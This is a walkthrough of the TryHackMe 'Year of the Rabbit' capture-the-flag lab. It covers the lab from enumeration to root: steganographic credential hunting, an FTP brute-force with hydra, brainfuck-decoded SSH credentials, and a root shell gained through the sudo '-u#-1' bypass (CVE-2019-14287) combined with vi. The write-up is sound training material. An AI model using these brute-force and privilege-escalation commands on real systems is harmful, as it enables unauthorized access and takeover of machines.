Year of the Rabbit - TryHackMe Walkthrough

“Can you hack into the Year of the Rabbit box without falling down a hole? Please ensure your volume is turned up!” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.

URL: Year of the Rabbit

Difficulty: Medium

Author: MuirlandOracle

Enumeration

We are given the IP 10.10.62.162. Run an nmap scan with the following command:

nmap -p- -A -o portscan 10.10.62.162

Here are the open ports:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works

Let’s check out HTTP on my browser:

port 80

This is a default apache2 web page. Let’s use dirb to find any other paths in the web directory:

dirb http://10.10.62.162/

dirb

assets:

assets

There is an irrelevant video and a css file.

A quick look at the css file and I found this:

css

  /* Nice to see someone checking the stylesheets.
     Take a look at the page: /sup3r_s3cr3t_fl4g.php
  */

Visiting that path prompts us with a message to disable JavaScript, then redirects us to a youtube page:

Rick Astley - Never Gonna Give You Up

Go to about:config to turn off your JS:

JS

Revisiting sup3r_s3cret_fl4g gives us this result:

No JS

Love it when people block Javascript...
This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!
Make sure your audio is turned up!

If you listen to the video, there is a voice that says “I will put you out of your misery, you are looking in the wrong place” (Around 50 seconds in).

I analysed the request and saw something of interest:

request

There is a hidden directory:

hidden dir

/intermediary.php?hidden_directory=/WExYY2Cv-qU

Let’s investigate this:

image in dir

/WExYY2Cv-qU/Hot_Babe.png is an image of a woman. I downloaded this image to my local machine and did some basic forensic investigation. I used a tool called exiftool to analyse the meta data:

exiftool Hot_Babe.png

exif

The warning message: [minor] Trailer data after PNG IEND chunk

This is talking about the trailer of the file data. Let’s use a tool called xxd to analyse the hex data of the file. I always redirect the output to a file called “hex” just to make it easier to analyse.

xxd Hot_Babe.png > hex

Since it mentioned something about the trailer, I had a look at the end of the file and found some text:

hidden xxd

You can also see the strings with the following command:

strings Hot_Babe.png

There is a hidden message that says:

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:

And then follows many lines of strings. I’m assuming one of the trailering strings after these lines is the password for the ftp server. Let’s redirect the strings to a file:

strings Hot_Babe.png > allstrings

Assuming one of the lines of text is the password, we could brute force the login with these as a wordlist. Let’s only include the lines after “One of these is the password:” in a wordlist:

sed -n '/^One of these is the password:$/ { :a; n; p; ba; }' allstrings > wordlist

We now have a file called “wordlist” with all of the strings after “One of these is the password:”. We can now construct a hydra command to brute-force the user “ftpuser” against our wordlist to try and gain authorised access.

hydra -V -l ftpuser -P wordlist ftp://10.10.62.162

hydra verbose

Using these credentials, let’s explore the ftp server:

ftp 10.10.62.162
ftpuser
5***********Q

There is a .txt file called “Eli’s_Creds.txt”. Transfer this over to your local machine.

get Eli's_Creds.txt
bye

ftp

cat Eli\'s_Creds.txt

Elis creds

It seems like some sort of encrypted data.

+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <

Based on experience, this looks like an Esoteric language.

Esoteric languages

This website will help decrypt the above data:

Try It Online - tio.run

Go to the brainfuck decryptor and enter in the data:

decrypt brainfuck

User: eli
Password: D***********d

User Eli

Let’s try and SSH using the credentials:

ssh [email protected]

ssh

We are logged in as “eli”. We have also been presented with a message:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

They mentiond the work “s3cr3t” which could be a directory name based on how they spelt it. I ran the following command to find this directory on the system:

find / -name s3cr3t -type d 2>/dev/null

find secret

There is a file called “.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!” in /usr/games/s3cr3t:

message

We have some possible credentials:

Gwendoline:M***********I

We have another user called “gwendoline” in the home directory.

/home

Let’s try and change to this user with the provided credentials:

su gwendoline

su

User gwendoline

There is a user.txt: /home/gwendoline/user.txt.

Now we need to escalate our privileges. Try the following command to see what the current user can execute as root:

sudo -l

sudo -l

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt

This basically means that gwendoline user can run vi command to read user.txt as every other user except root.

Notice how it is (ALL, !root) instead of (ALL, ALL). This is problematic because we can’t use sudo as root.

This was a difficult part for me because I had no idea how to run vi as root. I couldn’t exploit vi, so I researched ways to exploit sudo. You can find the version of sudo with the following command:

sudo -V

sudo v

Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3

I eventually found this CVE about exploiting sudo:

Sudo Exploit - ExploitDB

This is a good website explaining the exploit:

cve-2019-14287 - whitesourcesoftware

This is essentially the exploit:

sudo -u#-1

So we can construct the following command to use vi and escelate the privileges:

sudo -u#-1  /usr/bin/vi /home/gwendoline/user.txt
:set shell=/bin/sh
:shell

sudo rooooottttt

The last flag is in /root/root.txt.

Written on June 15, 2020